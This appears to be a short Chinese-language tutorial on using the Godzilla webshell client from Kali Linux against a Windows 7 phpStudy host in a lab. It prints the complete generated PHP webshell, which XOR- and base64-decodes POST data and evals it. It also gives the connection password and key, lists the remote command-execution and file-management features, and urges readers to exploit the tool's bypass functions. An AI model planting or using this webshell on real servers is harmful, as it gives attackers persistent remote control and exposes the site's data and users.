貓寧~~~
操作系統kali linux
https://github.com/BeichenDream/Godzilla
https://github.com/BeichenDream/Godzilla/releases
https://github.com/BeichenDream/Godzilla/releases/download/v1.10-godzilla/Godzilla-V1.10.jar
kali linux上已經有java環境
java -jar /root/Desktop/Godzilla-V1.10.jar
kali linux系統IP 10.108.18.98
windows 7系統IP 10.108.18.99
windows 7采用phpstudy啟用wamp
webshell客戶端,菜單管理項,生成 php類的webshell,加密器php_xor_base64
連接密碼和密鑰都是xiaozhupeiqi
生成xiaozhupeiqi.php
內容如下:
<?php session_start(); @set_time_limit(0); @error_reporting(0); function E($D,$K){ for($i=0;$i<strlen($D);$i++) { $D[$i] = $D[$i]^$K[$i+1&15]; } return $D; } function Q($D){ return base64_encode($D); } function O($D){ return base64_decode($D); } $P='xiaozhupeiqi'; $V='payload'; $T='620157faf8ab159f'; if (isset($_POST[$P])){ $F=O(E(O($_POST[$P]),$T)); if (isset($_SESSION[$V])){ $L=$_SESSION[$V]; $A=explode('|',$L); class C{public function nvoke($p) {eval($p."");}} $R=new C(); $R->nvoke($A[0]); echo substr(md5($P.$T),0,16); echo Q(E(@run($F),$T)); echo substr(md5($P.$T),16); }else{ $_SESSION[$V]=$F; } }
http://10.108.18.99/xiaozhupeiqi.php
菜單欄目標選項添加
填寫鏈接,密碼和密鑰
有效載荷php,加密方式php_xor_base64
測試連接成功
進入webshell管理界面
有基礎信息,命令執行,文件管理,數據庫管理等功能可以使用。
默認不設置代理,代理設置127.0.0.1 8081 http,burpsuite proxy的options對應設置,可以通過測試抓取流量
哥斯拉webshell客戶端對應UA是User-Agent: Java/11.0.7-ea
充分利用其中的繞過功能,利用好webshell客戶端工具。
over~~~